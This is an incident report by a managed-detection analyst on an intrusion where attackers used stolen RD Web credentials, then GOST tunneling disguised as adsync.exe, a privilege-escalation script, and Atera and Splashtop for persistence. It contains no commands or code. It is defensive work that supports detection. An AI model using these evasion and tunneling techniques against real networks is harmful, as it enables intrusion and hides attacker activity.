Tunnel Vision Threat Actors Using GOST in Real Attacks 

View the video to learn how Blackpoint SOC took swift action to protect partners. 

Tunnel Vision is an aspect of everyone’s life within some shape or form. Within the security industry, tunnel vision can impact proper network layout and segmentation. Focusing on addressing and focusing on one specific portion of the network can at times leave other subnets or vlans not up to par.  

As the saying goes, when there is a will there is always a way. Threat actors are determined to find a way to achieve their action on objectives during their operations. A key portion of this kill chain involves the threat actor setting up proper network communication to their Command and Control (C2) server. The Blackpoint SOC is observing an increase in the utilization of Go Simple Tunnel (GOST) during these breaches for tunneling and proxying of traffic to the attacker’s C2.  

Key Findings 

• Threat actors continue to utilize compromised credentials to access services including RD Web  
• Once within the network, the adversary will work on establishing a connection to their Command and Control (C2) server. 
• Threat Actors are leveraging open-sourced tools, including Go Simple Tunnel, to quickly tunnel and proxy traffic to their C2.  
• After establishing a connection back to their C2, the threat actor will attempt to escalate privileges before moving laterally 
• The utilization of these open-sourced tunneling tools increase the speed and effectiveness of a threat actor within the network.  

What is Go Simple Tunnel (GOST) 

Go Simple Tunnel (GOST) is an open sourced tunneling and proxy tool written in Golang. This tool is open-sourced, so anyone (including threat actors) can pull, modify, and or adapt this tool to their needs. The main functionality of this tool is either proxy traffic, port forward, or act as a reverse proxy. For cyber breaches, this tool is an asset within the toolbox to allow threat actors to port forward or proxy their traffic out to their C2.  

Utilization of this tool within breaches 

The Blackpoint SOC recently responded to an incident where a Threat Actor utilized GOST to tunnel out to two of their C2 servers. The Threat Actor gained initial access to the network via compromised credentials of a user. These compromised credentials allowed the threat actors to login to the RD Web Access, which provided access to the Remote Desktop Server (RDS). Once on this RDS server, the threat actor dropped GOST onto this server. 

Image 1 – Downloading of GOST onto RDS server 

After downloading this tool onto the host, the threat actor dropped into C:\ProgramData and renamed the binary as adsync.exe. This folder is hidden by default, therefore typical users would not notice its presence. The threat actor also renamed this binary to masquerade as a legitimate windows binary in further attempts to obfuscate their activity.  

Image 2 – Renaming GOST to adsync.exe 

Using this tunneling tool, the threat actor then set up tunnels to proxy traffic to their C2. The below commands show how the threat actors leveraged GOST to create a SOCKS5 proxy and tunnel traffic out to their C2 using TCP. 

Image 3 – Setting up SOCKS5 proxy and Tunneling out to C2 

After establishing these tunnels, the threat actor attempted to escalate their privileges with an Open-Sourced Privilege Escalation Script called PrivEscCheck. This tool is a known PrivEsc tool that helps identify areas an attacker can exploit to escalate their privileges. In this case, the TA saved the contents of this PowerShell script as a txt. This file was quickly identified by AMSI during execution and quarantined.  

Image 4 – Attempt to escalate privileges using PrivEscCheck 

After failing to escalate privileges, the threat actor turned to mapping the network to see what the account had access to. All of these attempts were failures, except a user’s workstation. After identifying that they could access this workstation, the threat actor remotely executed on the device and RDP’d onto the host. Once on this newly compromised host, the threat actor immediately dropped GOST and began tunneling out from this host to the 2^nd C2 utilized by this TA. The Threat Actor created two malicious services called “adsync” and “dcsync”, which again created a SOCKS5 proxy and tunneled traffic out to their second C2 using TCP. 

Image 6 – Process Tree tied to TA tunneling out on newly compromised device 

Further investigation found that this threat actor had also deployed both Atera and SplashTop on the newly compromised host. Both tools are Remote Management and Monitoring (RMM) tools, which are leveraged for backdoor access by the threat actor.  

Image 7 – Install of Atera and Splashtop 

During this short time period, the Blackpoint SOC identified the initial access mechanism, isolated all affected devices, and worked with our partner to get the compromised account in question disabled. The quick time periods between these events illustrates how quickly threat actors will move within a network.  

When one access method fails, they will turn to the next door to see if they can get in. Tunneling is a technique that is critical in all threat actor operations. The ease of use provided by GOST helps facilitate the speed of these threat actors during an operation.  

Tunneling and the proxying of traffic is a technique that is not going away anytime soon. More tools, including GOST, will be created which will help facilitate lateral movement by threat actors within these breaches. Therefore, it is critical to setup proper detections to flag illegitimate tunneling activity, especially tunneling stemming from GOST.  

Author: Nevan Beal, Sr. MDR Analyst